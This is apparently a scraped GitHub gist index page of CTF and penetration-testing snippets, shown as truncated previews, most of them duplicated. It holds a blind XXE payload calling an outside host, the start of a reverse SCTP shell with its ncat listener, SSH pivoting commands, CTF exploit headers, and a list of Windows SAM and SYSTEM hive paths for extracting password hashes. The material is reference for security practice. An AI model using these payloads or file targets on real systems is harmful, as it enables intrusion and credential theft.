waywardsun

## keepass2john.py
#!/usr/bin/python


# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
#   source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#

## 1.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                waywardsun
                / 1.md
            
            
              Created
              November 9, 2017 05:58
                — forked from sailik1991/0.0 CaptureTheFlag-CheetSheet.md
            
              
                Quick reference for CTF
              
          
[Attacks] (https://gist.github.com/sailik1991/c1d030edb98de7fead62061b5386c773#file-attacks-md)
[Prevention] (https://gist.github.com/sailik1991/c1d030edb98de7fead62061b5386c773#file-prevention-md)


## reverse_sctp_shell.c
// server: ncat -v --sctp -l PORT_NUM
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>

## ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1

#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080

#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## pwn.py
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this two leak a

## toilet-exploit.py
#!/usr/bin/env python2

from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit

MAX_NAME_LEN = 64

## offsec.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                waywardsun
                / offsec.md
            
            
              Created
              May 17, 2017 19:09
                — forked from trietptm/offsec.md
            
              
                Penetrating Testing/Assessment Workflow
              
          
    Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance

Passive/Semi-Passive

Tools


Discover - https://github.com/leebaird/discover


## windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini	This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system	This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system

## gist:84496cb1e4eeab23e421a6a0af60a3fa
my slides:
https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb

official docs:
http://www.secdev.org/projects/scapy/demo.html
http://www.secdev.org/projects/scapy/doc/usage.html#sniffing

some tutorials from the internet:
https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
https://samsclass.info/124/proj11/proj17-scapy.html
	#!/usr/bin/python


	# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
	# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
	# ./keepass2john.c was released under the GNU General Public License
	# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
	#
	# Python port by @harmj0y, GNU General Public License
	#
	// server: ncat -v --sctp -l PORT_NUM
	#include <stdio.h>
	#include <unistd.h>
	#include <netinet/in.h>
	#include <netinet/sctp.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <arpa/inet.h>
	#include <string.h>
	##SOCKS Proxy##
	#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
	#Command line:
	ssh -D 127.0.0.1:1080 10.0.0.1

	#~/.ssh/config:
	Host 10.0.0.1
	DynamicForward 127.0.0.1:1080

	#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/usr/bin/env python3
	#
	# Exploit for "assignment" of GoogleCTF 2017
	#
	# CTF-quality exploit...
	#
	# Slightly simplified and shortened explanation:
	#
	# The bug is a UAF of one or both values during add_assign() if a GC is
	# triggered during allocate_value(). The exploit first abuses this two leak a
	#!/usr/bin/env python2

	from pwn import *
	from re import findall
	from random import choice, randint
	from string import digits, ascii_uppercase
	from hashlib import sha256
	from sys import argv, exit

	MAX_NAME_LEN = 64
	%SYSTEMDRIVE%\boot.ini
	%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\system
	%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
	%WINDIR%\repair\sam
	%WINDIR%\repair\system
	my slides:
	https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb

	official docs:
	http://www.secdev.org/projects/scapy/demo.html
	http://www.secdev.org/projects/scapy/doc/usage.html#sniffing

	some tutorials from the internet:
	https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
	https://samsclass.info/124/proj11/proj17-scapy.html